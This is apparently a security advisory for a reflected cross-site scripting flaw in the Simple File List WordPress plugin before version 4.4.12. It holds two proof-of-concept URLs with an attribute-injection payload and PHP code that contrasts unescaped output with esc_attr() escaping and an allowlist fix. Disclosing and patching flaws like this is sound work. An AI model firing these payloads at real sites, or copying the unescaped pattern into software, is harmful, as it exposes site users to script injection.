The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=ee-simple-file-list&tab="style=animation-name:rotation+onanimationstart=alert(/XSS/)//
https://example.com/wp-admin/?page=ee-simple-file-list&tab=settings&subtab="style=animation-name:rotation+onanimationstart=alert(/XSS/)//
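The PHP below is an added illustration, not the plugin's source: it shows a request value echoed into a double-quoted attribute without escaping, next to versions that escape it with WordPress's `esc_attr()` and restrict it to known tab names. The function names, the hidden-field markup and the `file_list` tab name are assumptions.

```php
<?php
// Added example with hypothetical markup; this is not code from the plugin.

// Stand-in so the script runs outside WordPress. Inside WordPress the
// real esc_attr() is already defined and this shim is skipped.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Before: the value is concatenated straight into the attribute, so a
// double quote in the input ends value="..." and the rest of the input
// is parsed as further attributes of the same tag.
function render_tab_field_unescaped($tab) {
    return '<input type="hidden" name="tab" value="' . $tab . '">';
}

// After, step 1: escape on output. The quote becomes &quot; and the
// whole input stays inside the attribute value.
function render_tab_field_escaped($tab) {
    return '<input type="hidden" name="tab" value="' . esc_attr($tab) . '">';
}

// After, step 2: a tab name is a closed set, so anything not on the
// list (hypothetical names here) falls back to the default before output.
function render_tab_field_allowlisted($tab, array $allowed = ['file_list', 'settings']) {
    if (!in_array($tab, $allowed, true)) {
        $tab = $allowed[0];
    }
    return '<input type="hidden" name="tab" value="' . esc_attr($tab) . '">';
}

// Constructed input: the query string of the first URL above.
// parse_str() URL-decodes it, turning "+" into a space.
parse_str('page=ee-simple-file-list&tab="style=animation-name:rotation+onanimationstart=alert(/XSS/)//', $query);
$tab = $query['tab'];

echo render_tab_field_unescaped($tab), "\n";
echo render_tab_field_escaped($tab), "\n";
echo render_tab_field_allowlisted($tab), "\n";
```

Comparing the three printed lines shows where the attribute boundary ends up in each case.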
CPE

Name | Operator | Version |
---|---|---|
simple-file-list | lt | 4.4.12 |